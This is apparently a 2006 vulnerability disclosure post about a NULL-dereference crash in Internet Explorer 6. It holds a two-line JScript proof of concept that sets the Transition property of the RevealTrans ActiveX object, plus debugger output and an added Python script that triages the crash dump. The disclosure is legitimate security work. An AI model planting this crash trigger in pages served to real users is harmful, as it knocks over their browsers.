The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. Setting the Transition property of this object triggers a NULL dereference.
var a = new ActiveXObject('DXImageTransform.Microsoft.RevealTrans.1');
a.Transition = 1;
Demonstration
eax=00000000 ebx=00000000 ecx=35cde0c4
edx=00174972 esi=02d701d8 edi=00000001
eip=35cde0fe esp=0012b240 ebp=0012b25c
dxtmsft!CDXTRevealTrans::put_Transition+0x3a:
35cde0fe 8b08 mov ecx,[eax] ds:0023:00000000=????????
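The debugger output above can be triaged mechanically. The following Python script is an added example, not part of the original post: it parses the quoted dump, checks that the faulting instruction sits at eip, and classifies the access. The names triage, summary and the 64 KiB NEAR_NULL threshold are assumptions made for this example.

```python
import re

# The debugger output quoted in the post, embedded verbatim as sample input.
CRASH = """\
eax=00000000 ebx=00000000 ecx=35cde0c4
edx=00174972 esi=02d701d8 edi=00000001
eip=35cde0fe esp=0012b240 ebp=0012b25c
dxtmsft!CDXTRevealTrans::put_Transition+0x3a:
35cde0fe 8b08 mov ecx,[eax] ds:0023:00000000=????????
"""

NEAR_NULL = 0x10000  # assumption: addresses below 64 KiB count as "near NULL"

REG = re.compile(r"\b(e[a-z]{2})=([0-9a-f]{8})\b")
SYM = re.compile(r"^(\S+?)!(\S+?)\+0x([0-9a-f]+):$", re.M)
INS = re.compile(r"^([0-9a-f]{8}) ([0-9a-f]+) (\w+) (\S+) "
                 r"\w+:[0-9a-f]{4}:([0-9a-f]{8})=(\S+)$", re.M)

def triage(text):
    """Parse a register dump plus faulting instruction into a triage record."""
    regs = {name: int(val, 16) for name, val in REG.findall(text)}
    module, func, off = SYM.search(text).groups()
    addr, _opcode, mnemonic, operands, ea, value = INS.search(text).groups()
    dst, src = operands.split(",")
    # The bracketed operand is the memory access; its side gives the direction.
    access = "read" if "[" in src else "write" if "[" in dst else "none"
    base = re.search(r"\[(e[a-z]{2})\]", operands)
    ea = int(ea, 16)
    return {
        "module": module, "function": func, "offset": int(off, 16),
        "eip_matches": regs["eip"] == int(addr, 16),
        "mnemonic": mnemonic, "access": access, "address": ea,
        "base_reg": base.group(1) if base else None,
        "base_value": regs[base.group(1)] if base else None,
        "unmapped": set(value) == {"?"},   # debugger could not read the memory
        "near_null": ea < NEAR_NULL,
    }

def summary(text):
    """One-line classification suitable for a crash-bucketing report."""
    t = triage(text)
    kind = "NULL dereference" if t["near_null"] and t["unmapped"] else "access fault"
    return (f"{kind} ({t['access']} of 0x{t['address']:08x} via {t['base_reg']}) "
            f"in {t['module']}!{t['function']}+0x{t['offset']:x}")

if __name__ == "__main__":
    print(summary(CRASH))
```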
This bug will be added to the OSVDB:
Microsoft IE DXImageTransform.Microsoft.RevealTrans Transition Property NULL Dereference
Wednesday, July 12, 2006